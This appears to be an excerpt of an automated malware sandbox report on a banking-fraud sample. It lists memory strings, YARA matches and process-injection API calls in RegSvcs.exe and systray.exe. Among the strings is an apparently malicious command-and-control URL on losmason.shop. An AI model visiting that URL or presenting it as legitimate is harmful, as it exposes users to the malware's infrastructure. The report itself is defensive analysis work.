                Source: systray.exe, 00000013.00000002.4778260554.0000000002F85000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_authorize.srfclient_id=00000000480728C5&scope=service::ssl.live.com::
                Source: systray.exe, 00000013.00000002.4778260554.0000000002F61000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_desktop.srf?lc=1033
                Source: systray.exe, 00000013.00000002.4778260554.0000000002F61000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_desktop.srflc=1033
                Source: systray.exe, 00000013.00000002.4778260554.0000000002F61000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_logout.srfclient_id=00000000480728C5&redirect_uri=https://login.live.
                Source: systray.exe, 00000013.00000003.2802722991.0000000007B64000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_logout.srfhttps://login.live.com/oauth20_authorize.srfhttps://login.l
                Source: MN1qo2qaJmEvXDP.exe, rlJvZXSinaRi.exe.0.drString found in binary or memory: https://www.chiark.greenend.org.uk/~sgtatham/putty/0
                Source: systray.exe, 00000013.00000003.2808049665.0000000007B8E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.ecosia.org/newtab/
                Source: systray.exe, 00000013.00000003.2808049665.0000000007B8E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_lodp.ico
                Source: systray.exe, 00000013.00000002.4782860137.00000000057D8000.00000004.10000000.00040000.00000000.sdmp, aDvThgRLSEMTIq.exe, 00000014.00000002.4782686090.00000000030A8000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://www.losmason.shop/s15n/?Njld=LDTtwxbX2vi0G&Ebfx6=JfQJqlQL4YuujxfZFicS9Y3zSvzh5uc29LPY

E-Banking Fraud

Source: Yara match | File source: 10.2.RegSvcs.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 10.2.RegSvcs.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 0000000A.00000002.2621801367.00000000015F0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 0000000A.00000002.2615113559.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000013.00000002.4781597517.0000000004690000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000013.00000002.4781361365.0000000004640000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000013.00000002.4775040528.0000000000AB0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 0000000A.00000002.2624347397.00000000019B0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000012.00000002.4781302763.00000000024C0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 10_2_0042C7C3 NtClose
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 10_2_016D2B60 NtClose,LdrInitializeThunk
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 10_2_016D2DF0 NtQuerySystemInformation,LdrInitializeThunk
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 10_2_016D2C70 NtFreeVirtualMemory,LdrInitializeThunk
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 10_2_016D35C0 NtCreateMutant,LdrInitializeThunk
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 10_2_016D4340 NtSetContextThread
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 10_2_016D4650 NtSuspendThread
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 10_2_016D2BE0 NtQueryValueKey
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 10_2_016D2BF0 NtAllocateVirtualMemory
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 10_2_016D2BA0 NtEnumerateValueKey
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 10_2_016D2B80 NtQueryInformationFile
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 10_2_016D2AF0 NtWriteFile
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 10_2_016D2AD0 NtReadFile
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 10_2_016D2AB0 NtWaitForSingleObject
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 10_2_016D2D30 NtUnmapViewOfSection
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 10_2_016D2D00 NtSetInformationFile
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 10_2_016D2D10 NtMapViewOfSection
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 10_2_016D2DD0 NtDelayExecution
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 10_2_016D2DB0 NtEnumerateKey
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 10_2_016D2C60 NtCreateKey
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 10_2_016D2C00 NtQueryInformationProcess
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 10_2_016D2CF0 NtOpenProcess
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 10_2_016D2CC0 NtQueryVirtualMemory
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 10_2_016D2CA0 NtQueryInformationToken
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 10_2_016D2F60 NtCreateProcessEx
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 10_2_016D2F30 NtCreateSection
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 10_2_016D2FE0 NtCreateFile
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 10_2_016D2FA0 NtQuerySection
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 10_2_016D2FB0 NtResumeThread
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 10_2_016D2F90 NtProtectVirtualMemory
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 10_2_016D2E30 NtWriteVirtualMemory
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 10_2_016D2EE0 NtQueueApcThread
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 10_2_016D2EA0 NtAdjustPrivilegesToken
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 10_2_016D2E80 NtReadVirtualMemory
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 10_2_016D3010 NtOpenDirectoryObject
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 10_2_016D3090 NtSetValueKey
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 10_2_016D39B0 NtGetContextThread
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 10_2_016D3D70 NtOpenThread
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 10_2_016D3D10 NtOpenProcessToken
Source: C:\Windows\SysWOW64\systray.exe | Code function: 19_2_04B14650 NtSuspendThread,LdrInitializeThunk
Source: C:\Windows\SysWOW64\systray.exe | Code function: 19_2_04B14340 NtSetContextThread,LdrInitializeThunk
Source: C:\Windows\SysWOW64\systray.exe | Code function: 19_2_04B12CA0 NtQueryInformationToken,LdrInitializeThunk
Source: C:\Windows\SysWOW64\systray.exe | Code function: 19_2_04B12C70 NtFreeVirtualMemory,LdrInitializeThunk
Source: C:\Windows\SysWOW64\systray.exe | Code function: 19_2_04B12C60 NtCreateKey,LdrInitializeThunk
Source: C:\Windows\SysWOW64\systray.exe | Code function: 19_2_04B12DF0 NtQuerySystemInformation,LdrInitializeThunk
Source: C:\Windows\SysWOW64\systray.exe | Code function: 19_2_04B12DD0 NtDelayExecution,LdrInitializeThunk
Source: C:\Windows\SysWOW64\systray.exe | Code function: 19_2_04B12D30 NtUnmapViewOfSection,LdrInitializeThunk
Source: C:\Windows\SysWOW64\systray.exe | Code function: 19_2_04B12D10 NtMapViewOfSection,LdrInitializeThunk
Source: C:\Windows\SysWOW64\systray.exe | Code function: 19_2_04B12E80 NtReadVirtualMemory,LdrInitializeThunk
Source: C:\Windows\SysWOW64\systray.exe | Code function: 19_2_04B12EE0 NtQueueApcThread,LdrInitializeThunk
Source: C:\Windows\SysWOW64\systray.exe | Code function: 19_2_04B12FB0 NtResumeThread,LdrInitializeThunk
Source: C:\Windows\SysWOW64\systray.exe | Code function: 19_2_04B12FE0 NtCreateFile,LdrInitializeThunk
Source: C:\Windows\SysWOW64\systray.exe | Code function: 19_2_04B12F30 NtCreateSection,LdrInitializeThunk
Source: C:\Windows\SysWOW64\systray.exe | Code function: 19_2_04B12AF0 NtWriteFile,LdrInitializeThunk
Source: C:\Windows\SysWOW64\systray.exe | Code function: 19_2_04B12AD0 NtReadFile,LdrInitializeThunk
Source: C:\Windows\SysWOW64\systray.exe | Code function: 19_2_04B12BA0 NtEnumerateValueKey,LdrInitializeThunk
Source: C:\Windows\SysWOW64\systray.exe | Code function: 19_2_04B12BF0 NtAllocateVirtualMemory,LdrInitializeThunk
Source: C:\Windows\SysWOW64\systray.exe | Code function: 19_2_04B12BE0 NtQueryValueKey,LdrInitializeThunk
Source: C:\Windows\SysWOW64\systray.exe | Code function: 19_2_04B12B60 NtClose,LdrInitializeThunk
Source: C:\Windows\SysWOW64\systray.exe | Code function: 19_2_04B135C0 NtCreateMutant,LdrInitializeThunk
Source: C:\Windows\SysWOW64\systray.exe | Code function: 19_2_04B139B0 NtGetContextThread,LdrInitializeThunk
Source: C:\Windows\SysWOW64\systray.exe | Code function: 19_2_04B12CF0 NtOpenProcess
Source: C:\Windows\SysWOW64\systray.exe | Code function: 19_2_04B12CC0 NtQueryVirtualMemory
Source: C:\Windows\SysWOW64\systray.exe | Code function: 19_2_04B12C00 NtQueryInformationProcess
Source: C:\Windows\SysWOW64\systray.exe | Code function: 19_2_04B12DB0 NtEnumerateKey
Source: C:\Windows\SysWOW64\systray.exe | Code function: 19_2_04B12D00 NtSetInformationFile
Source: C:\Windows\SysWOW64\systray.exe | Code function: 19_2_04B12EA0 NtAdjustPrivilegesToken
Source: C:\Windows\SysWOW64\systray.exe | Code function: 19_2_04B12E30 NtWriteVirtualMemory
Source: C:\Windows\SysWOW64\systray.exe | Code function: 19_2_04B12FA0 NtQuerySection
Source: C:\Windows\SysWOW64\systray.exe | Code function: 19_2_04B12F90 NtProtectVirtualMemory
Source: C:\Windows\SysWOW64\systray.exe | Code function: 19_2_04B12F60 NtCreateProcessEx
Source: C:\Windows\SysWOW64\systray.exe | Code function: 19_2_04B12AB0 NtWaitForSingleObject
Source: C:\Windows\SysWOW64\systray.exe | Code function: 19_2_04B12B80 NtQueryInformationFile
Source: C:\Windows\SysWOW64\systray.exe | Code function: 19_2_04B13090 NtSetValueKey
Source: C:\Windows\SysWOW64\systray.exe | Code function: 19_2_04B13010 NtOpenDirectoryObject
Source: C:\Windows\SysWOW64\systray.exe | Code function: 19_2_04B13D10 NtOpenProcessToken
Source: C:\Windows\SysWOW64\systray.exe | Code function: 19_2_04B13D70 NtOpenThread
Source: C:\Windows\SysWOW64\systray.exe | Code function: 19_2_00AD9300 NtCreateFile
Source: C:\Windows\SysWOW64\systray.exe | Code function: 19_2_00AD9470 NtReadFile
Source: C:\Windows\SysWOW64\systray.exe | Code function: 19_2_00AD9560 NtDeleteFile
Source: C:\Windows\SysWOW64\systray.exe | Code function: 19_2_00AD9610 NtClose
Source: C:\Windows\SysWOW64\systray.exe | Code function: 19_2_00AD9770 NtAllocateVirtualMemory
Source: C:\Users\user\Desktop\MN1qo2qaJmEvXDP.exe | Code function: 0_2_009425E1
Source: C:\Users\user\Desktop\MN1qo2qaJmEvXDP.exe | Code function: 0_2_009413F0
Source: C:\Users\user\Desktop\MN1qo2qaJmEvXDP.exe | Code function: 0_2_00949B6C
Source: C:\Users\user\Desktop\MN1qo2qaJmEvXDP.exe | Code function: 0_2_00941B6A
Source: C:\Users\user\Desktop\MN1qo2qaJmEvXDP.exe | Code function: 0_2_00949CF0
Source: C:\Users\user\Desktop\MN1qo2qaJmEvXDP.exe | Code function: 0_2_00942030
Source: C:\Users\user\Desktop\MN1qo2qaJmEvXDP.exe | Code function: 0_2_0094A290
Source: C:\Users\user\Desktop\MN1qo2qaJmEvXDP.exe | Code function: 0_2_0094A259
Source: C:\Users\user\Desktop\MN1qo2qaJmEvXDP.exe | Code function: 0_2_00940871
Source: C:\Users\user\Desktop\MN1qo2qaJmEvXDP.exe | Code function: 0_2_00945250
Source: C:\Users\user\Desktop\MN1qo2qaJmEvXDP.exe | Code function: 0_2_00941362
Source: C:\Users\user\Desktop\MN1qo2qaJmEvXDP.exe | Code function: 0_2_009434D8
Source: C:\Users\user\Desktop\MN1qo2qaJmEvXDP.exe | Code function: 0_2_009455DA
Source: C:\Users\user\Desktop\MN1qo2qaJmEvXDP.exe | Code function: 0_2_009455E8
Source: C:\Users\user\Desktop\MN1qo2qaJmEvXDP.exe | Code function: 0_2_009457F0
Source: C:\Users\user\Desktop\MN1qo2qaJmEvXDP.exe | Code function: 0_2_009457E0
Source: C:\Users\user\Desktop\MN1qo2qaJmEvXDP.exe | Code function: 0_2_009439CC
Source: C:\Users\user\Desktop\MN1qo2qaJmEvXDP.exe | Code function: 0_2_00945A59
Source: C:\Users\user\Desktop\MN1qo2qaJmEvXDP.exe | Code function: 0_2_00945A68
Source: C:\Users\user\Desktop\MN1qo2qaJmEvXDP.exe | Code function: 0_2_00949CE0
Source: C:\Users\user\Desktop\MN1qo2qaJmEvXDP.exe | Code function: 0_2_07C88314
Source: C:\Users\user\Desktop\MN1qo2qaJmEvXDP.exe | Code function: 0_2_07C82549
Source: C:\Users\user\Desktop\MN1qo2qaJmEvXDP.exe | Code function: 0_2_07C82542
Source: C:\Users\user\Desktop\MN1qo2qaJmEvXDP.exe | Code function: 0_2_07C82472
Source: C:\Users\user\Desktop\MN1qo2qaJmEvXDP.exe | Code function: 0_2_07C823D0
Source: C:\Users\user\Desktop\MN1qo2qaJmEvXDP.exe | Code function: 0_2_07C82381
Source: C:\Users\user\Desktop\MN1qo2qaJmEvXDP.exe | Code function: 0_2_07C88A68
Source: C:\Users\user\Desktop\MN1qo2qaJmEvXDP.exe | Code function: 0_2_09441870
Source: C:\Users\user\Desktop\MN1qo2qaJmEvXDP.exe | Code function: 0_2_0966B920
Source: C:\Users\user\Desktop\MN1qo2qaJmEvXDP.exe | Code function: 0_2_09669860
Source: C:\Users\user\Desktop\MN1qo2qaJmEvXDP.exe | Code function: 0_2_09669C89
Source: C:\Users\user\Desktop\MN1qo2qaJmEvXDP.exe | Code function: 0_2_0966A0D0
Source: C:\Users\user\Desktop\MN1qo2qaJmEvXDP.exe | Code function: 0_2_0966C2C0
Source: C:\Users\user\Desktop\MN1qo2qaJmEvXDP.exe | Code function: 0_2_0966C2D0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 10_2_004186D3
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 10_2_004168C3
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 10_2_0040E0C3
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 10_2_004100E3
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 10_2_004168BE
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 10_2_004011B0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 10_2_0040E25C
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 10_2_00401A00
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 10_2_0040E207
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 10_2_0040E213
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 10_2_00402B50
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 10_2_00404356
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 10_2_0042EDF3
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 10_2_0040FEC3
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 10_2_00402690
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 10_2_00402F30
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 10_2_01728158
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 10_2_01690100
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 10_2_0173A118
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 10_2_017581CC
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 10_2_017541A2
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 10_2_017601AA
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 10_2_01732000
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 10_2_0175A352
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 10_2_017603E6
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 10_2_016AE3F0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 10_2_01740274
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 10_2_017202C0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 10_2_016A0535
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 10_2_01760591
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 10_2_01752446
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 10_2_01744420
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 10_2_0174E4F6
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 10_2_016A0770
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 10_2_016C4750
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 10_2_0169C7C0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 10_2_016BC6E0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 10_2_016B6962
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 10_2_016A29A0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 10_2_0176A9A6
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 10_2_016A2840
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 10_2_016AA840
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 10_2_016CE8F0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 10_2_016868B8
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 10_2_0175AB40
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 10_2_01756BD7
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 10_2_0169EA80
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 10_2_016AAD00
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 10_2_0173CD1F
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 10_2_0169ADE0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 10_2_016B8DBF
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 10_2_016A0C00
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 10_2_01690CF2
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 10_2_01740CB5
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 10_2_01714F40
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 10_2_01742F30
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 10_2_016E2F28
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 10_2_016C0F30
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 10_2_016ACFE0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 10_2_01692FC8
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 10_2_0171EFA0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 10_2_016A0E59
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 10_2_0175EE26
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 10_2_0175EEDB
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 10_2_0175CE93
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 10_2_016B2E90
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 10_2_016D516C
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 10_2_0168F17210_2_0168F172
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 10_2_0176B16B10_2_0176B16B
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 10_2_016AB1B010_2_016AB1B0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 10_2_0175F0E010_2_0175F0E0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 10_2_017570E910_2_017570E9
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 10_2_016A70C010_2_016A70C0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 10_2_0174F0CC10_2_0174F0CC
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 10_2_0168D34C10_2_0168D34C
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 10_2_0175132D10_2_0175132D
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 10_2_016E739A10_2_016E739A
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 10_2_017412ED10_2_017412ED
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 10_2_016BB2C010_2_016BB2C0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 10_2_016A52A010_2_016A52A0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 10_2_0175757110_2_01757571
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 10_2_017695C310_2_017695C3
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 10_2_0173D5B010_2_0173D5B0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 10_2_0169146010_2_01691460
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 10_2_0175F43F10_2_0175F43F
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 10_2_0175F7B010_2_0175F7B0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 10_2_016E563010_2_016E5630
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 10_2_017516CC10_2_017516CC
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 10_2_016A995010_2_016A9950
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 10_2_016BB95010_2_016BB950
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 10_2_0173591010_2_01735910
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 10_2_0170D80010_2_0170D800
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 10_2_016A38E010_2_016A38E0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 10_2_0175FB7610_2_0175FB76
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 10_2_01715BF010_2_01715BF0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 10_2_016DDBF910_2_016DDBF9
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 10_2_016BFB8010_2_016BFB80
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 10_2_01713A6C10_2_01713A6C
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 10_2_01757A4610_2_01757A46
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 10_2_0175FA4910_2_0175FA49
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 10_2_0174DAC610_2_0174DAC6
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 10_2_016E5AA010_2_016E5AA0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 10_2_01741AA310_2_01741AA3
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 10_2_0173DAAC10_2_0173DAAC
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 10_2_01757D7310_2_01757D73
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 10_2_016A3D4010_2_016A3D40
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 10_2_01751D5A10_2_01751D5A
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 10_2_016BFDC010_2_016BFDC0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 10_2_01719C3210_2_01719C32
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 10_2_0175FCF210_2_0175FCF2
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 10_2_0175FF0910_2_0175FF09
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 10_2_01663FD510_2_01663FD5
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 10_2_01663FD210_2_01663FD2
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 10_2_0175FFB110_2_0175FFB1
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 10_2_016A1F9210_2_016A1F92
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 10_2_016A9EB010_2_016A9EB0
